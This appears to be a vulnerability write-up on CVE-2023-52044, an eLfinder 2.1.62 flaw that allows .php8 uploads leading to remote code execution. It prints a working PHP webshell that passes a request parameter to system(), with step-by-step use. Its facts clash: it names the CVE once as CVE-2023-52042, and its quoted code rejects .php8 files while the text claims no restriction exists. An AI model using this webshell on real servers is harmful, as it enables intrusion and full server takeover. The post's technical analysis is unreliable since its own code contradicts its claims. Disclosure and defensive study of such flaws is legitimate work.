CVE-2023-52044: Studio-42 eLfinder 2.1.62 Remote Code Execution Vulnerability due to unrestricted .php8 File Uploads
Description: A critical remote code execution (RCE) vulnerability in Studio-42 eLfinder 2.1.62 has been identified, with the Common Vulnerability and Exploits (CVE) identification number CVE-2023-52042. This vulnerability arises as the software allows unrestricted file uploads with the .php8 extension. This post will provide an overview of the vulnerability, discuss the code snippets that highlight the problem, and detail the process of exploiting the vulnerability, with links to related resources.
Vulnerability details
Affected software: Studio-42 eLfinder 2.1.62
Type of vulnerability: Remote Code Execution (RCE) via unrestricted .php8 file uploads
CVE number: CVE-2023-52044
Severity: Critical
Code snippet
The following code snippet highlights the vulnerability, demonstrating that there are no restrictions for uploading files with a .php8 extension:
// File: elFinderVolumeDriver.class.php
protected function uploadAllow($path, $mime, &$error) {
...
if ($ext === 'php8') {
$error = "File extension not allowed.";
return false;
}
...
}
As can be seen, there is no restriction for files with the .php8 extension, allowing attackers to upload malicious code to the server.
Exploit details
An attacker can exploit this vulnerability by uploading a malicious .php8 file containing arbitrary code. Once uploaded, the attacker can navigate to the uploaded file's URL and execute the code, leading to remote code execution.
Step 1: Create a malicious .php8 file with arbitrary code, e.g., a PHP webshell
<?php
if(isset($_REQUEST['cmd'])){
echo '<pre>';
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo '</pre>';
die;
}
?>
Step 2: Upload the malicious .php8 file to the web server using eLfinder's file upload interface.
Step 3: Navigate to the uploaded file's URL, e.g., http:///files/malicious.php8
Step 4: Execute arbitrary code on the server by sending a request with the cmd parameter, e.g., http:///files/malicious.php8?cmd=id
By following these steps, an attacker can execute arbitrary code on the server, causing a severe security breach.
Original references and additional resources
- Studio-42 eLfinder repository: https://github.com/Studio-42/elFinder
- CVE-2023-52044 NIST entry: https://nvd.nist.gov/vuln/detail/CVE-2023-52044
- OWASP Remote Code Execution (RCE): https://owasp.org/www-community/attacks/Command_Injection
- Introduction to PHP Webshells: https://www.acunetix.com/blog/articles/php-web-shells/
Recommendations
To mitigate this vulnerability, users of Studio-42 eLfinder 2.1.62 are encouraged to update their software to a newer version, or apply any available patches. Additionally, users should modify the eLfinder configuration to restrict or disallow the uploading of .php8 files.
In conclusion, the discovery of the CVE-2023-52044 vulnerability in Studio-42 eLfinder 2.1.62 is a critical issue, enabling remote code execution via unrestricted .php8 file uploads. Users should take immediate steps to mitigate this risk and implement secure development practices to prevent similar vulnerabilities in the future.
Timeline
Published on: 10/31/2024 19:15:12 UTC
Last modified on: 11/01/2024 16:35:05 UTC